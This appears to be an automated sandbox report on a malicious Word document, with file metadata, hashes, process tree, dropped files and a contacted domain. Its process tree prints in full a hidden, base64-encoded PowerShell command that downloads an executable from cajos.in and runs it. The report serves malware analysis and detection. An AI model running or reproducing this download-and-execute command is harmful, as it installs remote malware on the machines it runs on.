File name: | 452449be3e14368f0bf72addba4833a405475249f06d8626baf61eef27662b89.doc |
Full analysis: | https://app.any.run/tasks/dd8a6644-49ad-46e9-bb87-8bc33fe9137a |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 02:23:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Neo Jarvis, Template: Normal.dotm, Last Saved By: Neo Jarvis, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed May 25 00:04:00 2016, Last Saved Time/Date: Wed May 25 00:04:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0 |
MD5: | 97D84A8BEC18B3D83E7A7CD7E0D7D0CF |
SHA1: | 3669D3205AD2EB096DD4949FAACCF859A9F3E6B2 |
SHA256: | 452449BE3E14368F0BF72ADDBA4833A405475249F06D8626BAF61EEF27662B89 |
SSDEEP: | 12288:/YWwZ93gfGgNGq5FQOzSZLfFyNUCBdYTrL2AzoTdJ8xsUeXq:DwnwfG2GkFgLfsXBEHtoTdGqU/ |
.doc | | | Microsoft Word document (35.9) |
---|---|---|
.xls | | | Microsoft Excel sheet (33.7) |
.doc | | | Microsoft Word document (old ver.) (21.3) |
Title: | - |
---|---|
Subject: | - |
Author: | Neo Jarvis |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | Neo Jarvis |
RevisionNumber: | 2 |
Software: | Microsoft Office Word |
TotalEditTime: | 1.0 minutes |
CreateDate: | 2016:05:24 23:04:00 |
ModifyDate: | 2016:05:24 23:04:00 |
Pages: | 1 |
Words: | - |
Characters: | 4 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 4 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2140 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\452449be3e14368f0bf72addba4833a405475249f06d8626baf61eef27662b89.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
760 | cmd.exe /c powershell.exe -ep bypass -noni -w hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAGEAagBvAHMALgBpAG4ALwAwAHgALwAxAC4AZQB4AGUAJwAsACcAbQBlAHMAcwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAG0AZQBzAHMALgBlAHgAZQAnAA== | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
676 | powershell.exe -ep bypass -noni -w hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAGEAagBvAHMALgBpAG4ALwAwAHgALwAxAC4AZQB4AGUAJwAsACcAbQBlAHMAcwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAG0AZQBzAHMALgBlAHgAZQAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREE35.tmp.cvr | — | |
MD5:— | SHA256:— | |||
676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49IJ4U6R692KC2X7OOQ7.temp | — | |
MD5:— | SHA256:— | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C111F99CD469831004E4547E39009B06 | SHA256:3479C3CB813B5D1C331B8400A690378D71DF89F98184E62788F05713D903F6AF | |||
676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$2449be3e14368f0bf72addba4833a405475249f06d8626baf61eef27662b89.doc | pgc | |
MD5:989D399A4AC3CACED36DC775AC8400A9 | SHA256:712E1ED7925F06C946FB9077E5F1D9344AF8CDFF21A6D8F86560002F87965036 | |||
676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fbe1.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
Domain | IP | Reputation |
---|---|---|
cajos.in |
| unknown |